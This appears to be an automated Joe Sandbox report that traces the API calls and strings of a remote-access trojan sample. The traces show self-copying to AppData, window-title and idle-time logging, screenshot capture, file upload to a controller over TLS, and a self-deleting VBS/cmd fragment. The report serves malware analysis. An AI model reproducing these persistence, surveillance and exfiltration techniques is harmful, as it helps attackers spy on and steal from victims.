                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: C:\Users\user\AppData\Roaming\eaJOpx.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                    • API String ID: 1646373207-690545036
                                                    • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                    • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                    • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                    • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 0040BC75
                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                    • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\eaJOpx.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                    • _wcslen.LIBCMT ref: 0040BD54
                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                    • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\eaJOpx.exe,00000000,00000000), ref: 0040BDF2
                                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                    • _wcslen.LIBCMT ref: 0040BE34
                                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                    • ExitProcess.KERNEL32 ref: 0040BED0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                    • String ID: 6$C:\Users\user\AppData\Roaming\eaJOpx.exe$del$open$BG$BG
                                                    • API String ID: 1579085052-1086633802
                                                    • Opcode ID: 931a9aef2d56b535125e3704433d820373bb9d54ed57f9781f46495b19b59438
                                                    • Instruction ID: 2f106158a8217a69bc194f5c9bf89c81f007fa4859a00edafeef48886470f02c
                                                    • Opcode Fuzzy Hash: 931a9aef2d56b535125e3704433d820373bb9d54ed57f9781f46495b19b59438
                                                    • Instruction Fuzzy Hash: DC51B1212082006BD609B722EC52E7F77999F81719F10443FF985A66E2DF3CAD4582EE
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$Info
                                                    • String ID: Zb1Y/
                                                    • API String ID: 2509303402-3232713500
                                                    • Opcode ID: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                    • Instruction ID: 94cb3ffe265cc5bcc4c1ad3ae65ec97d3e38ea61109583f3198c5827e9e35c68
                                                    • Opcode Fuzzy Hash: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                    • Instruction Fuzzy Hash: 22B19D71900A05AFEF11DFA9C881BEEBBB5FF09304F14416EE855B7342DA799C418B64
                                                    APIs
                                                    • lstrlenW.KERNEL32(?), ref: 0041B1E6
                                                    • _memcmp.LIBVCRUNTIME ref: 0041B1FE
                                                    • lstrlenW.KERNEL32(?), ref: 0041B217
                                                    • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B252
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B265
                                                    • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B2A9
                                                    • lstrcmpW.KERNEL32(?,?), ref: 0041B2C4
                                                    • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2DC
                                                    • _wcslen.LIBCMT ref: 0041B2EB
                                                    • FindVolumeClose.KERNEL32(?), ref: 0041B30B
                                                    • GetLastError.KERNEL32 ref: 0041B323
                                                    • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B350
                                                    • lstrcatW.KERNEL32(?,?), ref: 0041B369
                                                    • lstrcpyW.KERNEL32(?,?), ref: 0041B378
                                                    • GetLastError.KERNEL32 ref: 0041B380
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                    • String ID: ?
                                                    • API String ID: 3941738427-1684325040
                                                    • Opcode ID: 6a4cb5ae61c4e1df440fc7f8de9d62bda0aaac365b66e324bb944b49d49d109f
                                                    • Instruction ID: cf02e0f6f7b7a0e02f5bf76754478950043962dc0518326da89db1c5b002f683
                                                    • Opcode Fuzzy Hash: 6a4cb5ae61c4e1df440fc7f8de9d62bda0aaac365b66e324bb944b49d49d109f
                                                    • Instruction Fuzzy Hash: CC4163715087099BD7209FA0EC889EBB7E8EF44755F00093BF951C2261E778C998C7D6
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: _free$EnvironmentVariable$_wcschr
                                                    • String ID:
                                                    • API String ID: 3899193279-0
                                                    • Opcode ID: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
                                                    • Instruction ID: 310171947c9992e3776b826429fe42b14e002c37e8c837d056816c81c4ebeb3e
                                                    • Opcode Fuzzy Hash: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
                                                    • Instruction Fuzzy Hash: A7D13A71900310AFFB35AF7B888266E77A4BF06328F05416FF905A7381E6799D418B99
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                      • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB6F
                                                      • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                      • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                    • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                    • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                    • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                    • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                    • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                    • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                    • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                    • Sleep.KERNEL32(00000064), ref: 00412060
                                                      • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                    • String ID: /stext "$HDG$HDG$>G$>G
                                                    • API String ID: 1223786279-3931108886
                                                    • Opcode ID: 7d1c0c83bcbb3496ccda6e2cb47db5f4ac60100c7951170ebf23ef22ff8d459f
                                                    • Instruction ID: 0ab8a3329a483972d05e881652f5f37e7f84d863b53285be69f93207c3ffadf7
                                                    • Opcode Fuzzy Hash: 7d1c0c83bcbb3496ccda6e2cb47db5f4ac60100c7951170ebf23ef22ff8d459f
                                                    • Instruction Fuzzy Hash: 890243311083414AC325FB61D891AEFB7D5AFD4308F50493FF98A931E2EF785A49C69A
                                                    APIs
                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                    • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                    • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                    • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                    • API String ID: 2490988753-744132762
                                                    • Opcode ID: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                                                    • Instruction ID: f97e29e5006070a0e8b03c0efb597ee3aef86c3529fe4be05370ae17daaf5a45
                                                    • Opcode Fuzzy Hash: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                                                    • Instruction Fuzzy Hash: C331C4B1906315ABD320AF65DC44ACBB7ECEF44745F400A2AF844D7201D778DA858AEE
                                                    APIs
                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B856
                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B89A
                                                    • RegCloseKey.ADVAPI32(?), ref: 0041BB64
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: CloseEnumOpen
                                                    • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                    • API String ID: 1332880857-3714951968
                                                    • Opcode ID: 49e9a5a88561ce34b3f4bbc30c580386d809fbe1cc5ec4428c58f77622a0e172
                                                    • Instruction ID: efd277ba010ae8e34e1206f32af9d70b7e49420e91acd4d446967662cfc0484b
                                                    • Opcode Fuzzy Hash: 49e9a5a88561ce34b3f4bbc30c580386d809fbe1cc5ec4428c58f77622a0e172
                                                    • Instruction Fuzzy Hash: 67813E311082449BD324EB21DC51AEFB7E9FFD4314F10493FB586921E1EF34AA49CA9A
                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 0040A456
                                                    • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                    • GetForegroundWindow.USER32 ref: 0040A467
                                                    • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                    • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                    • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                      • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                    • String ID: [${ User has been idle for $ minutes }$4]G$4]G$4]G$]
                                                    • API String ID: 911427763-1497357211
                                                    • Opcode ID: 548b9b4b73023f7648ff88d39ff186e7cab5520984c04480b11492e53bc06be4
                                                    • Instruction ID: afbd458ed10e5c7c401a96cf43e60d64e5e0c384de04be689a5a7141a0feef4c
                                                    • Opcode Fuzzy Hash: 548b9b4b73023f7648ff88d39ff186e7cab5520984c04480b11492e53bc06be4
                                                    • Instruction Fuzzy Hash: 8851B1716043409BC224FB21D85AAAE7794BF84318F40493FF846A72D2DF7C9D55869F
                                                    APIs
                                                    • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAF9
                                                    • GetCursorPos.USER32(?), ref: 0041CB08
                                                    • SetForegroundWindow.USER32(?), ref: 0041CB11
                                                    • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB2B
                                                    • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB7C
                                                    • ExitProcess.KERNEL32 ref: 0041CB84
                                                    • CreatePopupMenu.USER32 ref: 0041CB8A
                                                    • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB9F
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                    • String ID: Close
                                                    • API String ID: 1657328048-3535843008
                                                    • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                    • Instruction ID: 3771bb7a8ff115e6e52fbd1847cd0ce42a02f589590b945df095e749b0e49bf2
                                                    • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                    • Instruction Fuzzy Hash: FF212A31148205FFDB064F64FD4EEAA3F25EB04712F004035B906E41B2D7B9EAA1EB18
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                    • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                    • __aulldiv.LIBCMT ref: 00407FE9
                                                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                    • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                    • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                    • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                    • API String ID: 1884690901-3066803209
                                                    • Opcode ID: 9df5948d7382cf6b602db3d3c6d548fe2f1b10a719ec4cb532c2586deab72b90
                                                    • Instruction ID: 4837f293f8898be8956b4197083d1ab2d903a2927be0ecc228378ed3697c5d3b
                                                    • Opcode Fuzzy Hash: 9df5948d7382cf6b602db3d3c6d548fe2f1b10a719ec4cb532c2586deab72b90
                                                    • Instruction Fuzzy Hash: 01B191715083409BC214FB25C892BAFB7E5ABD4314F40493EF889632D2EF789945CB9B
                                                    APIs
                                                    • Sleep.KERNEL32(00001388), ref: 00409E62
                                                      • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                      • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                      • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                      • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                      • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,00000000,00000000,00000000), ref: 0040A049
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                    • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                    • API String ID: 3795512280-3163867910
                                                    • Opcode ID: 2ad637de4abed7bea4a9c298fd38dc88212808bad0aa3e762a0e0af5c839b2e2
                                                    • Instruction ID: 8be46055dc56f0d2ec4b071ca6400761e29966989419bbb2416efbd82a73718c
                                                    • Opcode Fuzzy Hash: 2ad637de4abed7bea4a9c298fd38dc88212808bad0aa3e762a0e0af5c839b2e2
                                                    • Instruction Fuzzy Hash: 06517C616043005ACB05BB71D866ABF769AAFD1309F00053FF886B71E2DF3DA945869A
                                                    APIs
                                                    • ___free_lconv_mon.LIBCMT ref: 004500C1
                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F310
                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F322
                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F334
                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F346
                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F358
                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F36A
                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F37C
                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F38E
                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3A0
                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3B2
                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3C4
                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3D6
                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3E8
                                                    • _free.LIBCMT ref: 004500B6
                                                      • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                      • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                    • _free.LIBCMT ref: 004500D8
                                                    • _free.LIBCMT ref: 004500ED
                                                    • _free.LIBCMT ref: 004500F8
                                                    • _free.LIBCMT ref: 0045011A
                                                    • _free.LIBCMT ref: 0045012D
                                                    • _free.LIBCMT ref: 0045013B
                                                    • _free.LIBCMT ref: 00450146
                                                    • _free.LIBCMT ref: 0045017E
                                                    • _free.LIBCMT ref: 00450185
                                                    • _free.LIBCMT ref: 004501A2
                                                    • _free.LIBCMT ref: 004501BA
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                    • String ID:
                                                    • API String ID: 161543041-0
                                                    • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                    • Instruction ID: 71386be3831ae4e36ed8ba8c0666741f952bc44bbd11cc85bbb3aa2ad55dcdb0
                                                    • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                    • Instruction Fuzzy Hash: D5318135600B009FEB30AA39D845B5773E9EF02325F11842FE849E7692DF79AD88C719
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 0041913D
                                                    • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041916F
                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191FB
                                                    • Sleep.KERNEL32(000003E8), ref: 0041927D
                                                    • GetLocalTime.KERNEL32(?), ref: 0041928C
                                                    • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419375
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                    • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                    • API String ID: 489098229-65789007
                                                    • Opcode ID: a5ca4fe806690e1fb78547f9ad46a3276a709212a97fd00fc62dd46e2bc7de04
                                                    • Instruction ID: 451d4021779863bb8065bd5e36f4a774b326d3833db1a6038cb7dac0f018a91b
                                                    • Opcode Fuzzy Hash: a5ca4fe806690e1fb78547f9ad46a3276a709212a97fd00fc62dd46e2bc7de04
                                                    • Instruction Fuzzy Hash: 56519071A002449ACB14BBB5D866AFE7BA9AB45304F00407FF849B71D2EF3C5D85C799
                                                    APIs
                                                    • connect.WS2_32(?,?,?), ref: 004042A5
                                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                    • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                    • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                    • API String ID: 994465650-2151626615
                                                    • Opcode ID: 0e18f61abc9e3d8a2747cabaf845d162c66a56537a1401371773013c123a1612
                                                    • Instruction ID: feeaa4dc0a5480c3be004408dd81f6e2390fe6c9429734df96c13844dfc6b1ca
                                                    • Opcode Fuzzy Hash: 0e18f61abc9e3d8a2747cabaf845d162c66a56537a1401371773013c123a1612
                                                    • Instruction Fuzzy Hash: 3E4116B1B002026BCB04B77A8C4B66E7A55AB81354B40016FE901676D3FE79AD6087DF
                                                    APIs
                                                      • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                      • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                      • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                      • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                      • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                    • ExitProcess.KERNEL32 ref: 0040C832
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                    • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                    • API String ID: 1913171305-390638927
                                                    APIs
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    APIs
                                                      • Part of subcall function 00454660: CreateFileW.KERNEL32(00000000,?,?,;JE,?,?,00000000,?,00454A3B,00000000,0000000C), ref: 0045467D
                                                    • GetLastError.KERNEL32 ref: 00454AA6
                                                    • __dosmaperr.LIBCMT ref: 00454AAD
                                                    • GetFileType.KERNEL32(00000000), ref: 00454AB9
                                                    • GetLastError.KERNEL32 ref: 00454AC3
                                                    • __dosmaperr.LIBCMT ref: 00454ACC
                                                    • CloseHandle.KERNEL32(00000000), ref: 00454AEC
                                                    • CloseHandle.KERNEL32(?), ref: 00454C36
                                                    • GetLastError.KERNEL32 ref: 00454C68
                                                    • __dosmaperr.LIBCMT ref: 00454C6F
                                                    Strings
                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                    • String ID: H
                                                    • API String ID: 4237864984-2852464175
                                                    APIs
                                                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E13,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BE6
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C69
                                                    • __alloca_probe_16.LIBCMT ref: 00452CA1
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E13,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CFC
                                                    • __alloca_probe_16.LIBCMT ref: 00452D4B
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D13
                                                      • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D8F
                                                    • __freea.LIBCMT ref: 00452DBA
                                                    • __freea.LIBCMT ref: 00452DC6
                                                    Strings
                                                    • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                    • String ID: Zb1Y/
                                                    • API String ID: 201697637-3232713500
                                                    Strings
                                                    • API ID:
                                                    • String ID: 65535$udp
